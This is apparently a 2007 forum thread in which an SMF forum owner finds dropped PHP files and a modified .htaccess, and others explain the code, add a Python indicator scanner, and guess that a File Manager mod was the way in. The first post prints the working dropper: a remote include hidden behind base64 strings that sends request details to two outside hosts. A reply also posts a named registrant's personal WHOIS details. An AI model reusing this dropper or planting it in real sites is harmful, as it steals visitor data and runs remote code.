Has my SMF been hacked?

Started by SniffTheGlove, February 12, 2007, 09:47:06 PM


SniffTheGlove

I have also posted to http://www.simplemachines.org/community/index.php?topic=150202.0 in case that it is not TP related. Sorry

I think someone has hacked into various SMF forums I have.

I have noticed that rogue files with names made up of 5 numerals have appeared, and they comprise this code:

error_reporting(0);   // suppress any warning the remote include might print
$s = "e";             // literal marker placed into the query string below
// Gather request and server details (the second form of each is the old register_globals name)
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// Each value is base64-encoded and joined with "."; the bare "e" marker sits after the client address
$str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "."
     . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h)
     . ".$s." . base64_encode($i) . "." . base64_encode($j);
// Remote include; the base64 literals decode to "http://", "www3.phptags.ws" and "shop.vmarket.info".
// The gathered details travel as the query string; the second host is tried if the first include fails.
if ((include(base64_decode("aHR0cDovLw==") . base64_decode("d3d3My5waHB0YWdzLndz") . "/?" . $str))) {
} else {
    include(base64_decode("aHR0cDovLw==") . base64_decode("c2hvcC52bWFya2V0LmluZm8=") . "/?" . $str);
}


Also, the .htaccess file has been modified to:
Code:

Options -MultiViews
ErrorDocument 404 //frp/Themes/default/84248.php


I have not added any mods on the days these files were created. Also, these appear in multiple forums; one forum does not even have any mods, though they all have TP.

They appear in every folder on my sites.

Can anybody shed any light on what the PHP code does, and how they got placed in all my directories?

I do not believe that the host has been hacked as it is only the SMF forum sites that have been touched.

~Thanks

Thurnok

What the code is doing is performing an include (inserting code from a file or URL; in this case a URL, as you can see below), and at the end of the include it is listing various info about your server. Most likely for marketing / spamming purposes.

The two includes in the code are basically this:

http://www3.phptags.ws/?<various gathered server info about your server>
and
http://shop.vmarket.info/?<various gathered server info about your server>


So, the two domains listed above are responsible.  Sounds like it is time to sign them up for their own spam.  ;)

As for the .htaccess: looks like they have set it up to launch their code any time someone would normally get a 404 error from your site (they type in an invalid URL on your domain, for example).

So, the answer to your question is "Yes". Someone hacked into your site in order to place that info there (PHP files, and modifying your .htaccess files).
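
The following is an added example, not code from the thread or from SMF/TinyPortal: a Python scan for the three indicators Thurnok describes (five-digit .php filenames, include() calls built from base64 literals, and an ErrorDocument pointing at a script), plus a decoder for the dot-separated query string the dropper sends. The sample files and the beacon fields are constructed here; the two domains are the ones the base64 literals in the posted snippet decode to.

```python
"""Indicator scan for the remote-include dropper described in the thread above."""
from __future__ import annotations

import base64
import re
import tempfile
from pathlib import Path

# Constructed sample of the injected file, same shape as the posted snippet:
# base64 literals glued together into include(), with a fallback host.
SAMPLE_PHP = (
    '<?php error_reporting(0);$s="e";'
    '$str=base64_encode($_SERVER["HTTP_HOST"]);'
    'if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} '
    'else {include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);}'
)
SAMPLE_HTACCESS = "Options -MultiViews\nErrorDocument 404 //frp/Themes/default/84248.php\n"

# One piece of an include() argument: base64_decode("...") or a plain string literal.
PIECE = r'(?:base64_decode\(\s*"[A-Za-z0-9+/=]+"\s*\)|"[^"]*")'
INCLUDE_PREFIX = re.compile(r'include(?:_once)?\s*\(\s*(' + PIECE + r'(?:\s*\.\s*' + PIECE + r')*)')
PIECE_CAPTURE = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)|"([^"]*)"')
ERROR_DOCUMENT = re.compile(r'^\s*ErrorDocument\s+(\d{3})\s+(\S+)', re.MULTILINE)
NUMERIC_PHP_NAME = re.compile(r'^\d{5}\.php$')


def remote_include_targets(php_source: str) -> list[str]:
    """Decode the literal prefix of every include(); the variable tail ($str) is
    not a literal, so what remains is the URL the dropper contacts."""
    targets = []
    for m in INCLUDE_PREFIX.finditer(php_source):
        parts = []
        for piece in PIECE_CAPTURE.finditer(m.group(1)):
            if piece.group(1) is not None:
                parts.append(base64.b64decode(piece.group(1), validate=True).decode("utf-8", "replace"))
            else:
                parts.append(piece.group(2))
        targets.append("".join(parts))
    return targets


def suspicious_error_documents(htaccess_text: str) -> list[tuple[str, str]]:
    """ErrorDocument lines whose handler is a script: this is how the dropped
    file gets executed on any mistyped URL."""
    return [(code, target) for code, target in ERROR_DOCUMENT.findall(htaccess_text)
            if target.lower().endswith(".php")]


def scan_tree(root: Path) -> list[dict]:
    """Walk a web root and report each indicator as {path, indicator, detail}."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = str(path.relative_to(root))
        text = path.read_text(errors="replace")
        if path.name == ".htaccess":
            for code, target in suspicious_error_documents(text):
                findings.append({"path": rel, "indicator": "errordocument_php", "detail": f"{code} -> {target}"})
        elif path.suffix == ".php":
            if NUMERIC_PHP_NAME.match(path.name):
                findings.append({"path": rel, "indicator": "numeric_filename", "detail": path.name})
            for url in remote_include_targets(text):
                findings.append({"path": rel, "indicator": "remote_include", "detail": url})
    return findings


def encode_beacon(fields: list[str]) -> str:
    """Victim-side encoding as the PHP does it: base64 each field, join with ".",
    literal "e" marker after the 8th field (the client address)."""
    enc = [base64.b64encode(f.encode("utf-8")).decode("ascii") for f in fields]
    return ".".join(enc[:8] + ["e"] + enc[8:])


def decode_beacon(query_string: str) -> list[str]:
    """What the receiving host sees. Base64 never contains ".", so splitting is safe."""
    return [field if field == "e" else base64.b64decode(field).decode("utf-8", "replace")
            for field in query_string.split(".")]


def build_sample_root() -> Path:
    """Constructed web root: one dropped file, a tampered .htaccess and a benign index.php."""
    root = Path(tempfile.mkdtemp(prefix="smf-scan-"))
    (root / "Themes" / "default").mkdir(parents=True)
    (root / "Themes" / "default" / "84248.php").write_text(SAMPLE_PHP)
    (root / ".htaccess").write_text(SAMPLE_HTACCESS)
    (root / "index.php").write_text('<?php require_once("SSI.php"); echo "ok";')
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_root()):
        print(f"{f['indicator']:20} {f['path']}: {f['detail']}")
```

Run it against a real web root by replacing build_sample_root() with the path downloaded over FTP; decode_beacon tells you exactly which request details (host, URI, referrer, user agent, client address, script path, language) each hit of the dropper shipped off-site.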

SniffTheGlove

Thanks Thurnok,

OK, so I have to find out...

1) Was it from my cPanel account? (Asking host now via support ticket)
2) Was the host server hacked? (Asking host now via support ticket; not likely, as only the SMF/TP forums were touched)
3) Was it a flaw in SMF 1.1.1 that gave them access to my site? (Asking at SMF)
4) Was it a flaw in SMF 1.1.1/TP that gave them access to my site? (Asking here)
5) Was it via FTP? (Doubtful, as all accounts have different username/password)
6) Done by the devil :)

Thanks. I would also advise people to view their own sites via FTP to check them, as I only came across these when accessing via FTP to check the status of an uploaded CSV file I have running on a cron job. So I had missed these files for over 2 weeks.

Thanks again

akulion

Just checked in my directories; nothing there which shouldn't be there.

Thurnok

Some info on your perpetrator:

Domain ID:D14512147-LRMS
Domain Name:VMARKET.INFO
Created On:28-Aug-2006 11:22:00 UTC
Last Updated On:28-Oct-2006 02:28:25 UTC
Expiration Date:28-Aug-2007 11:22:00 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)
Status:OK
Registrant ID:DI_3794215
Registrant Name:Brad Yasinski
Registrant Organization:N/A
Registrant Street1:Krowoderskich 36/12
Registrant Street2:
Registrant Street3:
Registrant City:Tarnow
Registrant State/Province:
Registrant Postal Code:11220
Registrant Country:PL
Registrant Phone:+480.145214714
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:startinfo2005@yahoo.com
Name Server:NS1.VMARKET.INFO
Name Server:NS2.VMARKET.INFO

SniffTheGlove

Thanks again,

Some additional info. The same problem is discussed here http://www.jaguarpc.com/forums/showthread.php?t=13305

I don't use cubecart but suspect the same vulnerability in php/SMF was used.

IchBin

It doesn't have to be something from your account. If you're on a shared host account it could very well be that they executed the exploit from another account and it affected EVERYONE on the server you're on. I highly doubt it was SMF myself.

SniffTheGlove

I have a reply from the host. They say that the server was not compromised, and there is one other account with SMF running that was not affected by this hack, therefore their belief is that it happened via SMF.

I am still trying to locate the raw log files, but as I had them set to delete every month it looks like I shall not get hold of them.

IchBin

IMO, I think they're feeding you a line of crap. Ask them for proof. They should have a log of all activity on the server. A good host will know how it happened and where they gained access. If you think it's SMF then please fill out a security report when you get a moment.
http://www.simplemachines.org/about/security.php

Thurnok

I believe I found the source of failure that allowed this hack. Did you have the SMF File Manager mod installed, Sniff?

I've done some checking and tracked it down on another site, and it appears to have been due to that mod. I also wrote a small cleanup for it. I'll make that available here later... gotta go eat..
